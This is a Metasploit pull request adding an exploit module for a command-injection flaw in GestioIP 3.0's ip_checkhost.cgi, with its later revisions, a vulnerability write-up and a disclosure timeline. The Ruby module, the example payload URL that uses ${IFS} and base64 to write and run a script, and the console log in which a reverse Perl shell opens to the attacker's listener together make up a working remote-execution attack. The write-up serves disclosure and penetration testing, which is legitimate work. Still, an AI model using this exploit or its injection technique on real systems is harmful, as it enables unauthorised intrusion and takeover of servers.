### PR TITLE
GestioIP v3 Authenticated Remote Command Execution

### DIFF
--- a/modules/exploits/multi/http/gestioip_exec.rb
+++ b/modules/exploits/multi/http/gestioip_exec.rb
@@ -1,0 +1,81 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GestioIP Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a command injection flaw to create a shell script
+        on the FS and execute it.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'bperry'  #Initial Discovery and metasploit module
+        ],
+      'References'     =>
+        [
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 475, # not a lot of room
+          'DisableNops' => true,
+          'BadChars'    => "#",
+        },
+      'Platform'        => [ 'unix', 'win', 'linux' ],
+      'Arch'            => ARCH_CMD,
+      'Targets'         => [[ 'Automatic GestioIP 3.0', { }]],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Mar 3 2011',
+      'DefaultTarget'   => 0))
+
+    register_options(
+    [
+      OptString.new('URI', [true, 'URI', '/gestioip/']),
+      OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
+      OptString.new('PASSWORD', [false, 'The password to auth with', 'password']),
+      OptBool.new('USE_AUTH', [true, 'Whether to attempt basic authentication or not', false])
+    ], self.class)
+  end
+
+  def uri
+    datastore['URI']
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def use_auth
+    datastore['USE_AUTH']
+  end
+
+  def exploit
+    headers = {}
+    if use_auth
+      headers['Authorization'] = "Basic " + Rex::Text.encode_base64("#{user}:#{pass}")
+    end
+
+    pay = Rex::Text.encode_base64(payload.encoded)
+    file = Rex::Text.rand_text_alpha(8);
+    send_request_cgi({
+      'uri' => uri+"ip_checkhost.cgi?ip=2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004&hostname=fsd&client_id=1&ip_version=",
+      'headers' => headers
+    })
+  end
+end

--- a/modules/exploits/multi/http/gestioip_exec.rb
+++ b/modules/exploits/multi/http/gestioip_exec.rb
@@ -28,6 +28,9 @@ class Metasploit4 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
+          [ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
+          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
         ],
       'Payload'        =>
         {
@@ -39,7 +42,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Arch'            => ARCH_CMD,
       'Targets'         => [[ 'Automatic GestioIP 3.0', { }]],
       'Privileged'      => false,
-      'DisclosureDate'  => 'Mar 3 2011',
+      'DisclosureDate'  => 'Oct 4 2013',
       'DefaultTarget'   => 0))
 
     register_options(

--- a/modules/exploits/multi/http/gestioip_exec.rb
+++ b/modules/exploits/multi/http/gestioip_exec.rb
@@ -17,7 +17,9 @@ class Metasploit4 < Msf::Exploit::Remote
       'Name'           => 'GestioIP Remote Command Execution',
       'Description'    => %q{
         This module exploits a command injection flaw to create a shell script
-        on the FS and execute it.
+        on the filesystem and execute it. If GestioIP is configured to use no authentication,
+        no password is required to exploit the vulnerability. Otherwise, an authenticated
+        user is required to exploit.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -44,8 +46,7 @@ class Metasploit4 < Msf::Exploit::Remote
     [
       OptString.new('URI', [true, 'URI', '/gestioip/']),
       OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
-      OptString.new('PASSWORD', [false, 'The password to auth with', 'password']),
-      OptBool.new('USE_AUTH', [true, 'Whether to attempt basic authentication or not', false])
+      OptString.new('PASSWORD', [false, 'The password to auth with', nil])
     ], self.class)
   end
 
@@ -62,7 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def use_auth
-    datastore['USE_AUTH']
+    !(pass.nil? or pass.empty?)
   end
 
   def exploit


### PR DESCRIPTION
GestioIP v3 Remote Command Execution

GestioIP v3 (and possibly other versions prior) is susceptible to a remote command execution vulnerability in the ip_checkhost.cgi page. An attacker can craft a special HTTP request to ping an IPv6 address to achieve remote command execution.

Example request with payload:

http://192.168.1.14/gestioip/ip_checkhost.cgi?ip=2607:f0d0:$(echo${IFS}PD9waHAKCiAgcGhwaW5mbygpOwo/Pgo=|base64${IFS}--decode|tee${IFS}phpinfo.php):0000:0000:0000:0000:0004&hostname=fsd&client_id=1&ip_version=

No spaces are allowed, but you can get around this restriction by using ${IFS} in place of spaces. The above payload will create a small PHP script with phpinfo() in it on the root of the application. The total payload size limit is 500 characters max, so there isn't a whole lot of space to play in.

By not specifying an ip_version in the query string, any extra sanitization/checking of the payload does not occur since the application checks explicitly for ipv4 or ipv6 as the values. The address in the query string is passed to the ping6 utility and the command is executed with system().

```
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole -q 
msf > use exploit/multi/http/gestioip_exec 
msf exploit(gestioip_exec) > set PAYLOAD cmd/unix/reverse_perl 
msf exploit(gestioip_exec) > set LHOST 172.31.16.15 
msf exploit(gestioip_exec) > set USE_AUTH true 
msf exploit(gestioip_exec) > set RHOST 172.31.16.50 
msf exploit(gestioip_exec) > show options 

Module options (exploit/multi/http/gestioip_exec): 

   Name      Current Setting  Required  Description 
   ----      ---------------  --------  ----------- 
   PASSWORD  password         no        The password to auth with 
   Proxies                    no        Use a proxy chain 
   RHOST     172.31.16.50     yes       The target address 
   RPORT     80               yes       The target port 
   URI       /gestioip/       yes       URI 
   USERNAME  gipadmin         no        The username to auth as 
   USE_AUTH  true             yes       Whether to attempt basic authentication or not 
   VHOST                      no        HTTP server virtual host 

Payload options (cmd/unix/reverse_perl): 

   Name   Current Setting  Required  Description 
   ----   ---------------  --------  ----------- 
   LHOST  172.31.16.15     yes       The listen address 
   LPORT  4444             yes       The listen port 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic GestioIP 3.0 

msf exploit(gestioip_exec) > exploit 

[*] Started reverse handler on 172.31.16.15:4444 
[*] Command shell session 1 opened (172.31.16.15:4444 -> 172.31.16.50:49605) at 2013-10-03 07:37:46 -0700 

id 
uid=33(www-data) gid=33(www-data) groups=33(www-data) 
^C 
Abort session 1? [y/N]  y 

[*] 172.31.16.50 - Command shell session 1 closed.  Reason: User exit 
msf exploit(gestioip_exec) > 
```

Disclosure timeline:

Oct 2 – Initial Discovery
Oct 3 – Initial Metasploit Module and Vendor Contact, sent PGP key
Oct 3 – Vendor response with PGP key, details of vuln sent
Oct 3 – Vendor releases patch (http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/)

Vulnerable version available in a base64-encoded flavor in this gist: https://gist.github.com/brandonprry/6826061/raw/b2b024a8eb137cd77785c40c5682f7174c048e25/gistfile1.txt

Should be able to wget the file and pipe into base64 --decode

This vulnerability has been fixed with the following commit:
http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/
